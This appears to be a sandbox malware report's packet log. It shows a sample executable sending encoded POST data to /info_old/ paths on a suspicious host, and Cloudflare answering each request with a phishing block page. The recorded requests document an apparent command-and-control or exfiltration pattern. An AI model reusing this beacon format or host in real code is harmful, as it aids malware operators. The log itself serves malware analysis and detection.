Mar 7, 2021 19:21:15.858613014 CET | 719 | IN
                                                                                                                                                                Data Ascii: e=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,proje
Mar 7, 2021 19:21:15.858638048 CET | 720 | IN
                                                                                                                                                                Data Ascii: <div class="cf-section cf-wrapper"> <div class="cf-columns two"> <div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire
Mar 7, 2021 19:21:15.858658075 CET | 722 | IN
                                                                                                                                                                Data Ascii: lease contact the Trust &amp; Safety team for more information.</p> </div> </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-
Mar 7, 2021 19:21:15.858671904 CET | 722 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0
Mar 7, 2021 19:21:26.895971060 CET | 934 | OUT | POST /info_old/e HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                                upgrade-insecure-requests: 1
                                                                                                                                                                Content-Length: 677
                                                                                                                                                                Host: 9a3a97f6f45f2c2b.com
Mar 7, 2021 19:21:26.896104097 CET | 935 | OUT
                                                                                                                                                                Data Ascii: info=WySAnbXjWTW8YGXUGcJV9d7X5TCichBlJPUwNag-FnYiWEFnHlmr4jMCmeh0lWrDRtqTifHGq114n62eLqovS6CpRvHelxHsYQgfv6UkXl-Tp-W2CDUCyoY_zzduqn_u26OmGrloRmRCvkaKviZHprT6kb2CnJ9V253fE9o5sG4A1NZeS3ssy4Bsgks81n924QlWS29ySQyILQOSwloNJLapwy7Iu1RdQ7c_-WYy-85tha
Mar 7, 2021 19:21:26.950754881 CET | 936 | IN | HTTP/1.1 200 OK
                                                                                                                                                                Date: Sun, 07 Mar 2021 18:21:26 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Set-Cookie: __cfduid=d6ace4fad79b146bfd51659b6e27f09161615141286; expires=Tue, 06-Apr-21 18:21:26 GMT; path=/; domain=.9a3a97f6f45f2c2b.com; HttpOnly; SameSite=Lax
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                cf-request-id: 08af854c160000069ab2b1f000000001
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=8xhZqdQjJ4ehHfU13DVLNoefzpNrH0V5RENXxOIHzdGuv8pfSbzRTBOA1GVR%2BQxnJMMHnYcoZQT2oXAppCsjcj0%2FviXYusQMpqIsqGGgDdsN%2BIdA7Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 62c5d7f358ed069a-LHR
                                                                                                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chr
Mar 7, 2021 19:21:26.950779915 CET 937 IN
                                                                                                                                                                Data Ascii: ome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,pro
Mar 7, 2021 19:21:26.950814962 CET 939 IN
                                                                                                                                                                Data Ascii: > <div class="cf-section cf-wrapper"> <div class="cf-columns two"> <div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquir
Mar 7, 2021 19:21:26.950838089 CET 940 IN
                                                                                                                                                                Data Ascii: please contact the Trust &amp; Safety team for more information.</p> </div> </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:tex
Mar 7, 2021 19:21:26.950851917 CET 940 IN Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0
Mar 7, 2021 19:21:27.087616920 CET 942 OUT POST /info_old/w HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                                upgrade-insecure-requests: 1
                                                                                                                                                                Content-Length: 81
                                                                                                                                                                Host: 9a3a97f6f45f2c2b.com
Mar 7, 2021 19:21:27.087721109 CET 942 OUT
                                                                                                                                                                Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVYxyRt0-Ufg1U9INIMC9p9w~
Mar 7, 2021 19:21:27.143291950 CET 965 IN HTTP/1.1 200 OK
                                                                                                                                                                Date: Sun, 07 Mar 2021 18:21:27 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Set-Cookie: __cfduid=d4c0cb31064e271fa3aa9579a78cf5ac81615141287; expires=Tue, 06-Apr-21 18:21:27 GMT; path=/; domain=.9a3a97f6f45f2c2b.com; HttpOnly; SameSite=Lax
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                cf-request-id: 08af854cd30000069abb2d6000000001
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=vzObZv23%2B2dc%2FEzQuNQ9jGCXlUT7u4h%2FaqJgYJLPnD5EYYctEhgjEfmtiq3bgzVu%2FZ9qmMawdWdKHwTSWTiEQiA44ahm244546U8x0eVrZliQWwABg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 62c5d7f48c03069a-LHR
                                                                                                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,c
Mar 7, 2021 19:21:27.143326998 CET 966 IN
                                                                                                                                                                Data Ascii: hrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,p
Mar 7, 2021 19:21:27.143744946 CET 967 IN
                                                                                                                                                                Data Ascii: --> <div class="cf-section cf-wrapper"> <div class="cf-columns two"> <div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acqu
Mar 7, 2021 19:21:28.347409010 CET 973 OUT POST /info_old/g HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                                upgrade-insecure-requests: 1
                                                                                                                                                                Content-Length: 1393
                                                                                                                                                                Host: 9a3a97f6f45f2c2b.com
Mar 7, 2021 19:21:28.347574949 CET 974 OUT
                                                                                                                                                                Data Ascii: info=WySAnbXjWTW8YGXUGcJV9d7X5TCichBlJPUwNag-FnYiWEFnHlmr4jMCmeh0lWrDRtqTifHGq114n62eLqovS6CpRvHelxHsYQgfv6UkXl9SOQ3fJGNAl0SOHxdBt-mzqzLtF98GX34K7DUbnLA3B7z_F9ZaMU_1ht8a5FFRze3pVlVMeB6SvamWkVzMhkgBSP5Zuu__3jp5BNNiOjDhJSEKvzkd5N9ciRSH_X0MDSAlq0
Mar 7, 2021 19:21:28.401530027 CET 976 IN HTTP/1.1 200 OK
                                                                                                                                                                Date: Sun, 07 Mar 2021 18:21:28 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Set-Cookie: __cfduid=d8d97df32c6eac1fa6ba938a3d57aa15f1615141288; expires=Tue, 06-Apr-21 18:21:28 GMT; path=/; domain=.9a3a97f6f45f2c2b.com; HttpOnly; SameSite=Lax
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                cf-request-id: 08af8551bf0000069a8606c000000001
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=1kUe9fj1%2BFN9ca0sSDcrGgFPRhK86VM6RbKfyNqUZrcU7nQxD28gxiSWsrzdlYxWoOPQ%2FEkzWg0BOYzI89KagsXR%2Fc63noXGXqW4nuXijAfHf85HLA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 62c5d7fc6915069a-LHR
                                                                                                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chr
Mar 7, 2021 19:21:28.563278913 CET 981 OUT POST /info_old/w HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                                upgrade-insecure-requests: 1
                                                                                                                                                                Content-Length: 81
                                                                                                                                                                Host: 9a3a97f6f45f2c2b.com
Mar 7, 2021 19:21:28.563522100 CET 981 OUT
                                                                                                                                                                Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVTsSQwMTI3T4uQu6BWMgxpg~
Mar 7, 2021 19:21:28.615767956 CET 982 IN HTTP/1.1 200 OK
                                                                                                                                                                Date: Sun, 07 Mar 2021 18:21:28 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Set-Cookie: __cfduid=d8d97df32c6eac1fa6ba938a3d57aa15f1615141288; expires=Tue, 06-Apr-21 18:21:28 GMT; path=/; domain=.9a3a97f6f45f2c2b.com; HttpOnly; SameSite=Lax
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                cf-request-id: 08af8552970000069acdbf4000000001
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=gRi15HGcc4Tl%2BV1AN05CjctDW4TEhyIwyDaJu0jx86jDiRJzRJ74HeeoajiqiT6rFu2QPJYf%2BNSK%2B6FNIQm8fl6Wrfmkk1s%2Ba%2BQBNSrmqxr4mPCZGQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 62c5d7fdbc99069a-LHR
                                                                                                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge
Mar 7, 2021 19:21:28.757026911 CET 987 OUT GET /info_old/r HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                                upgrade-insecure-requests: 1
                                                                                                                                                                Host: 9a3a97f6f45f2c2b.com
                                                                                                                                                                Mar 7, 2021 19:21:28.808964968 CET | 989 | IN | HTTP/1.1 200 OK
                                                                                                                                                                Date: Sun, 07 Mar 2021 18:21:28 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Set-Cookie: __cfduid=d8d97df32c6eac1fa6ba938a3d57aa15f1615141288; expires=Tue, 06-Apr-21 18:21:28 GMT; path=/; domain=.9a3a97f6f45f2c2b.com; HttpOnly; SameSite=Lax
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                cf-request-id: 08af8553580000069acd80f000000001
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=jZatBTkSU177GiU1hxErPYYMS29%2BHteqeQl%2BOrCet0kEgIZhKnlRxiAMNUQ8nczgr6e8lq9VMPiyc9mrcdzBpX7jdK%2FZAexmYZs1hBKxDo5TwKBKZg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 62c5d7feffc5069a-LHR
                                                                                                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chr
                                                                                                                                                                Mar 7, 2021 19:21:31.330152988 CET | 1140 | OUT | POST /info_old/w HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                                upgrade-insecure-requests: 1
                                                                                                                                                                Content-Length: 81
                                                                                                                                                                Host: 9a3a97f6f45f2c2b.com
                                                                                                                                                                Mar 7, 2021 19:21:31.330271959 CET | 1140 | OUT | Data Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 56 55 2d 51 62 38 74 50 46 55 69 49 63 37 71 61 73 54 53 41 70 4b 38 35 4b 2d 4a 71 42 34 57 79 32 77 30 67 6f 35 4c 5a 74 58 56 65 4c 39 39 71 72 45 30 32 4f 31 47 46 52 6a 30 50 36 5f 47 36 63 7e
                                                                                                                                                                Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVeL99qrE02O1GFRj0P6_G6c~
                                                                                                                                                                Mar 7, 2021 19:21:31.383521080 CET | 1142 | IN | HTTP/1.1 200 OK
                                                                                                                                                                Date: Sun, 07 Mar 2021 18:21:31 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Set-Cookie: __cfduid=d3d708ff0d3a610712dc240c40fb83a7d1615141291; expires=Tue, 06-Apr-21 18:21:31 GMT; path=/; domain=.9a3a97f6f45f2c2b.com; HttpOnly; SameSite=Lax
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                cf-request-id: 08af855d670000069a7213f000000001
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=4Ch4JIFCSePRtKo7bqe2vYpwCp9e1YBDzGk20Kshtuc7KCS8KnmH1VyiTDUGRZYW6qFNWrS10RduopHHAj7wYdbry0Trgt0DVARDXSxqFK4%2BWXTbgw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 62c5d80f0f32069a-LHR
                                                                                                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=


                                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                                                3 | 192.168.2.5 | 49725 | 104.21.6.78 | 80 | C:\Users\user\Desktop\IpB8f8qwze.exe
                                                                                                                                                                Timestamp | kBytes transferred | Direction | Data
                                                                                                                                                                Mar 7, 2021 19:21:17.033041954 CET | 734 | OUT | POST /info_old/w HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                                upgrade-insecure-requests: 1
                                                                                                                                                                Content-Length: 81
                                                                                                                                                                Host: 9a3a97f6f45f2c2b.com
                                                                                                                                                                Mar 7, 2021 19:21:17.035136938 CET | 734 | OUT | Data Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 56 55 2d 51 62 38 74 50 46 55 69 49 63 37 71 61 73 54 53 41 70 4b 38 35 4b 2d 4a 71 42 34 57 79 32 77 30 67 6f 35 4c 5a 74 58 56 5a 71 41 6c 37 6f 41 47 6b 49 49 72 67 68 6a 57 58 33 49 71 4c 4d 7e
                                                                                                                                                                Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVZqAl7oAGkIIrghjWX3IqLM~
                                                                                                                                                                Mar 7, 2021 19:21:17.099524975 CET | 736 | IN | HTTP/1.1 200 OK
                                                                                                                                                                Date: Sun, 07 Mar 2021 18:21:17 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Set-Cookie: __cfduid=d2be6d6a3ea4eb383fabf3b8c04a24b3f1615141277; expires=Tue, 06-Apr-21 18:21:17 GMT; path=/; domain=.9a3a97f6f45f2c2b.com; HttpOnly; SameSite=Lax
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                cf-request-id: 08af85258c00005439e533a000000001
                                                                                                                                                                Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=cN5nACD41CoWEP7e8eOaA4IgSwMZcP5aqWqJZy2EHa7DzHl6C71in8E%2Fu5kaFvO4489uvLSZttaufg57WASNV2c0dJls%2FyNuZjmebyO0w15KA2MIIA%3D%3D"}],"max_age":604800}
                                                                                                                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 62c5d7b5ab6e5439-LHR
                                                                                                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrom
                                                                                                                                                                Mar 7, 2021 19:21:17.099549055 CET | 737 | IN | Data Raw: 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63
                                                                                                                                                                Data Ascii: e=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,proje
                                                                                                                                                                Mar 7, 2021 19:21:17.099570036 CET | 739 | IN | Data Raw: 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 65 63 74 69 6f 6e 20 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 73 20 74 77 6f 22 3e 0a 20 20
                                                                                                                                                                Data Ascii: <div class="cf-section cf-wrapper"> <div class="cf-columns two"> <div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire
                                                                                                                                                                Mar 7, 2021 19:21:17.099590063 CET | 740 | IN | Data Raw: 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 54 72 75 73 74 20 26 61 6d 70 3b 20 53 61 66 65 74 79 20 74 65 61 6d 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69
                                                                                                                                                                Data Ascii: lease contact the Trust &amp; Safety team for more information.</p> </div> </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-
                                                                                                                                                                Mar 7, 2021 19:21:17.099652052 CET | 740 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0
                                                                                                                                                                Mar 7, 2021 19:21:21.726310015 CET | 749 | OUT | POST /info_old/w HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                                upgrade-insecure-requests: 1
                                                                                                                                                                Content-Length: 81
                                                                                                                                                                Host: 9a3a97f6f45f2c2b.com
                                                                                                                                                                Mar 7, 2021 19:21:21.726397991 CET | 749 | OUT | Data Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 56 55 2d 51 62 38 74 50 46 55 69 49 63 37 71 61 73 54 53 41 70 4b 38 35 4b 2d 4a 71 42 34 57 79 32 77 30 67 6f 35 4c 5a 74 58 56 54 76 50 6e 4c 71 30 6a 53 62 4a 64 41 33 55 69 37 66 4d 79 72 38 7e
                                                                                                                                                                Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVTvPnLq0jSbJdA3Ui7fMyr8~
                                                                                                                                                                Mar 7, 2021 19:21:21.782521009 CET | 751 | IN | HTTP/1.1 200 OK
                                                                                                                                                                Date: Sun, 07 Mar 2021 18:21:21 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Set-Cookie: __cfduid=d6882a86d0017a58981839067beefb08b1615141281; expires=Tue, 06-Apr-21 18:21:21 GMT; path=/; domain=.9a3a97f6f45f2c2b.com; HttpOnly; SameSite=Lax
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                cf-request-id: 08af8537e4000054392f8cd000000001
